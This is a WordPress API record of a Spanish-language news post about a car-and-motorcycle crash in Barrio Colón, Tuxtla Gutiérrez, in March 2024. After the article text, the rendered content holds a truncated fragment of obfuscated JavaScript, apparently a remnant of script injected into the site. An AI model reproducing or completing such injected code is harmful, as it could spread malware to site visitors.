{"id":14460,"date":"2024-03-01T23:58:55","date_gmt":"2024-03-01T23:58:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14460"},"modified":"2024-03-01T23:58:56","modified_gmt":"2024-03-01T23:58:56","slug":"accidente-de-transito-en-el-barrio-colon-salda-con-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14460","title":{"rendered":"Accidente de tr\u00e1nsito en el Barrio Col\u00f3n salda con da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709337430238-1024x768.jpg\" alt=\"\" class=\"wp-image-14461\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709337430238-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709337430238-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709337430238-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1709337430238.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 1 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana se registr\u00f3 un accidente entre un Vw Vento, de color gris y una motocicleta Italika de color rojo con negro, a la altura de la 8a Norte, esquina de la 1a Poniente del Barrio Col\u00f3n.Los reportes oficiales informaron que, el motociclista circulaba en el carril de Norte a Sur, y al atravesar la interseccion fue embestido por el coche.Por el golpe, el motociclista qued\u00f3 tirado a media calle y no pudo ser atendido por param\u00e9dicos por la falta de unidades.Los elementos de tr\u00e1nsito tomaron dato de lo sucedido.Afortunadamente los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 1 de marzo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana se registr\u00f3 un accidente entre un Vw Vento, de color gris y una motocicleta Italika de color rojo con negro, a la altura de la 8a Norte, esquina de la 1a Poniente del Barrio Col\u00f3n.Los reportes oficiales informaron que, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14461,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14460","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14460","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14460"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14460\/revisions"}],"predecessor-version":[{"id":14462,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14460\/revisions\/14462"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14461"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}